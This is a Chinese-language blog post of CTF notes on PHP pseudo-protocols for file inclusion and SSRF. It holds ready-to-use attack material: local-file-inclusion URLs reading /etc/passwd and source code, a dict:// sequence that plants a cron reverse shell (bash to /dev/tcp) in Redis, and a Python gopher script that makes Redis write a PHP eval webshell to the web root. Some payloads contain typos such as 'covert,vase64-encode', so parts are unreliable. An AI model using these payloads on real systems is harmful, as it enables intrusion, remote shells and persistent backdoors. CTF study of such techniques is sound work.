CTF常用伪协议总结

已于 2022-02-26 21:16:13 修改
阅读量6k 收藏 70
点赞数 8
分类专栏: ctf总结 文章标签: php 安全 web安全
于 2022-02-26 21:15:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51735061/article/details/123156046
版权

PHP伪协议

  • file://协议

    用来读取本地的文件,当用于文件读取函数时可以用。

    常见检测是否存在漏洞写法:

    www.xxx.com/?file=file:///etc/passwd

    此协议不受allow_url_fopen,allow_url_include配置影响


  • php://input协议

    此协议一般用于输入getshell的代码。

    • 使用方法:

      在get处填上php://input如下

      www.xxx.xxx/?cmd=php://input

      然后用hackbar或者其他工具,postPHP代码进行检验,如

      <?php>phpinfo()?>

    此协议受allow_url_include配置影响


  • php://filter协议

    此协议一般用来查看源码

    一般用法如下

    www.xxx.xxx/?file=php://filter/read=covert,vase64-encode/resource=index.php

    出来的是base64码需要进行解码

    此协议不受allow_url_fopen,allow_url_include配置影响


  • data://协议

    需要allow_url_fopen,allow_url_include均为on

    这是一个输入流执行的协议,它可以向服务器输入数据,而服务器也会执行。常用代码如下:

    http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

    text/plain,表示的是文本

    text/plain;base64, 若纯文本没用可用base64编码

  • dict://协议

    与gopher协议一般都出现在ssrf协议中,用来探测端口的指纹信息。同时也可以用它来代替gopher协议进行ssrf攻击。

    常见用法:

    • 探测端口指纹

      192.168.0.0/?url=dict://192.168.0.0:6379

      以上为探测6379(redis)端口的开发

    • 反弹shell

      1、开启反弹shell的监听

      nc -l 9999

      2、依次执行下面的命令

      curl dict://192.168.0.119:6379/set:mars:"\n\n * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1\n\n"
      curl dict://192.168.0.119:6379/config:set:dir:/etc/
      curl dict://192.168.0.119:6379/config:set:dbfilename:crontab
      curl dict://192.168.0.119:6379/bgsave      *

      执行时,反弹shell的命令,也就是set:mars:xxx,会因为特殊字符的原因无法写入到目标的redis中,被被空格所分割导致出现一下情况:

      1584705879.520734 [0 172.17.0.1:44488] “set” “mars” “\n\n*” “" "” “" "” “root” “bash” “-i” “>&” “/dev/tcp/192.168.0.119/6789” "0>&1\n\n"

      我们会发现,命令被分割了,看表象感觉像是被空格分割了。此时将反弹shell的命令进行十六进制转换,变为:

      curl dict://192.168.0.119:6379/set:mars:"\x0a\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x72\x6f\x6f\x74\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x30\x2e\x31\x31\x39\x2f\x39\x39\x39\x39\x20\x30\x3e\x26\x31\x0a"

      以上单引号使用反斜杠\进行转移,其他数据进行十六进制编码,执行结果如下,可以发现没有错误了

      1584706087.980465 [0 172.17.0.1:44490] “set” “mars” "\n * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1\n"*

      剩下的修改路径和文件名称的请求,正常执行即可

  • gopher://协议

    gopher://协议经常用来打内网的各种应用如mysql redis等。一般要用一些工具来进行构造payload 如gopherus等

    之前用来打redis内网的脚本如下

    #!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib.request
from urllib.parse import quote

url = "http://192.168.239.78:41403/index.php?url="    #windows上搭建的ssrf漏洞页面
gopher = "gopher://0.0.0.0:6379/_" #/var/www/html
#auth nonono
# 攻击脚本
data = """
flushall
set test "\\n\\n<?php @eval($_POST[x]);?>\\n\\n"
config set dir /var/www/html
config set dbfilename shell.php
save
quit
"""
def encoder_url(data):
    encoder = ""
    for single_char in data:
        # 先转为ASCII
        encoder += str(hex(ord(single_char)))
    encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
    return encoder

# 二次编码
encoder = encoder_url(encoder_url(data))

print(encoder)
# 生成payload
payload = url + quote(gopher,'utf-8') + encoder

# 发起请求
request = urllib.request.Request(payload)
response = urllib.request.urlopen(request).read()
print(response)

  • zip://协议

    zip://协议可以用来访问服务器中的压缩包,无论压缩包里面的文件是什么类型的都可以执行。也就是说如果服务器禁止我们上传php文件那么我们可以把php文件改后缀然后压缩再上传,然后用zip协议访问。要利用zip协议时一般要结合文件上传与文件包含两个漏洞

    一般的代码为

    www.xxx.xxx/?file=zip:///php.zip#phpinfo.jpg

    其中的#好表示的是php.zip的子文件名。有时候#需要变成==%23==,url编码。


  • compress.bzip2://协议

    与zip协议类似不过要压缩成bzip2格式的


  • compress.zlib://协议

    与zip协议类似不过要压缩成zlib格式的


  • phar://协议

    phar://协议与zip://协议类似,它也可以访问zip包,访问的格式与zip的不同,如下所示

    http://127.0.0.1/include.php?
file=phar:///phpinfo.zip/phpinfo.txt
#这里用/隔开了子文件
Asionm
关注
  • 8
    点赞
  • 70
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ctf之php协议的使用
一只菜鸟呀的博客
05-20 1183
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
【网络安全 | CTF】攻防世界 Web_php_include【php协议|data协议|file协议
等风来
05-22 9650
是 PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
ctf文件包含+协议总结
limenzzz的博客
09-08 2306
基本原理
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php协议、data协议、file协议)
最新发布
2401_84208172的博客
05-24 1219
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php协议、data协议、file协议),该题考察文件包含漏洞,涉及PHP协议data协议file协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
CTFctf中用到的php协议总结及例题(持续更)
weixin_52450702的博客
02-03 2931
ctf中用到的php协议总结及例题
ctf常用的PHP协议
weixin_35756637的博客
01-02 712
CTF比赛中,常常会使用PHP协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP协议有几种常见的形式: data: 协议 这种形式的PHP协议常用于在HTML中嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP协议常用于在浏览器中执行PHP代码,例如:...
CTF常用脚本归档CTF常用脚本归档
12-29
ctf web解题 找flag夺旗赛
CTF常见密码总结.docx
04-10
ctf解题中总结的一些实用的密码(编码方式),非常适合刚入坑的新手参考学习。比如常见的栅栏密码,摩斯电码,还有一些不常见的比如培根密码等等等等,非常全面!!!
CTF常用工具crc暴力破解
01-29
CTF常用工具crc暴力破解,根据不同需求选择不同字节的爆破密码,大大减少了爆破加密压缩包的时间可以实现不解密直接爆破出文件内的具体内容。
CTF比赛中zip的总结1
08-03
本文将对CTF比赛中涉及的zip相关技术进行总结,主要包括隐写术、加密技巧以及格式篡改等。 首先,我们来看隐写术的应用。一种常见的方法是通过进制转换隐藏信息。例如,在ISCC 2017 Basic-04题目中,提供的txt文档...
ctf比赛常用工具软件
04-21
ctf比赛常用软件工具,包括隐写、编辑、webtool(蚁剑、御剑)、exe、misc杂项、数据库相关工具
攻防_漏洞_Redis未授权
redglare的博客
01-11 1876
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis未授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
CTF-WEB:PHP 协议
xv66666的博客
07-29 371
在 index.php 页面下有个 file 参数用于接收要包含的文件,设置之为 php://input 协议,用 post 传递要执行的 php 代码。对于变量 user,当传进去的变量的参数作为文件名变量去打开时,可用 php://input 作为参数,同时使用 post 方式传入内容作为变量的文件内容。当包含的文件在服务器本地时,就形成了本地文件包含。,产生原因是在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。
CTF常用的php协议总结
Y4tacker的博客
08-04 8113
文章目录总览file://php://php://filterphp://inputdata://参考文章 总览 php:// — 访问各个输入/输出流(I/O streams) file:// — 访问本地文件系统 phar:// — PHP 归档 zlib:// — 压缩流 data:// — 数据(RFC 2397) http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs glob:// — 查找匹配的文件路径模式 ssh2:// — Secure Shell
Web安全之PHP的协议漏洞利用,以及协议漏洞防护方法
Scalzdp的专栏
11-13 2081
单纯看协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
【网络安全 | CTF】攻防世界 fileclude 解题详析(php协议
等风来
07-31 4454
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
BUUCTF 12
qq_52431855的博客
01-25 177
知识点 联合注入:在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 file协议: 中文意思:本地文件传输协议 什么是File:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 如何使用File:要使用File协议,基本的格式如下:file:///文件路径,比如要打开F盘flash文件夹中的1.swf文件,那么可以在资源管理器或浏览器地址栏中输入:file:///f:/flash/1.swf回车。 12-1[网鼎杯 2018]Fake...
php中使用curl发送请求和图片压缩
weixin_34074740的博客
05-26 199
简单自用封装:在helper文件下新建curl_helper.php, 如果系统存在则命名前需加MY_,autoload中设置自动加载,则可以直接使用:echo send_get($url) // 使用curl发送请求 function send_get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, ...
ctf php协议
10-15
好的,关于您的问题,我可以简单地解释一下。CTF中的PHP协议是一种特殊的协议,可以在PHP代码中使用,用于执行一些特殊的操作,例如读取文件、执行系统命令等。它的语法类似于URL,以"php://"开头,后面跟着一些参数和值。但是需要注意的是,使用PHP协议可能存在安全风险,因此在实际应用中需要谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值